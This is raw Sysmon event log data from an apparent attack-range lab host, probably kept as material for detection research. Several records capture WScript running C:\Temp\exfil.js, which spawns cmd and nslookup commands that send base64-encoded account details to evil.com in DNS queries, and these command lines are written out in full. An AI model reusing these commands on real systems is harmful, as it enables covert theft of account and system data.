354300x8000000000000000210531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.717{00000000-0000-0000-0000-000000000000}7716<unknown process>-udptruefalse127.0.0.1-50790-false127.0.0.1-53domain 10341000x8000000000000000210530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-18F0-629A-4B44-000000005F02}72367256C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4C44-000000005F02}7000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4C44-000000005F02}7000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.145{2E1864BB-18F0-629A-4A44-000000005F02}60125980C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-4C44-000000005F02}7000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.151{2E1864BB-18F0-629A-4C44-000000005F02}7000C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-4A44-000000005F02}6012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmlr.tmp 2>&1 10341000x8000000000000000210522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.114{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4B44-000000005F02}7236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.114{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4B44-000000005F02}7236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.114{2E1864BB-18F0-629A-4B44-000000005F02}72367256C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4A44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.098{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4B44-000000005F02}7236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4A44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-18E0-629A-6742-000000005F02}39766448C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-4A44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.093{2E1864BB-18F0-629A-4A44-000000005F02}6012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmlr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.083{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxg.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-18F0-629A-4844-000000005F02}77122388C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4944-000000005F02}2944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4944-000000005F02}2944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.044{2E1864BB-18F0-629A-4744-000000005F02}3127152C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-4944-000000005F02}2944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.053{2E1864BB-18F0-629A-4944-000000005F02}2944C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-4744-000000005F02}312C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxg.tmp 2>&1 10341000x8000000000000000210502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.013{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4844-000000005F02}7712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.013{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4844-000000005F02}7712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.013{2E1864BB-18F0-629A-4844-000000005F02}77122388C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4744-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4844-000000005F02}7712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 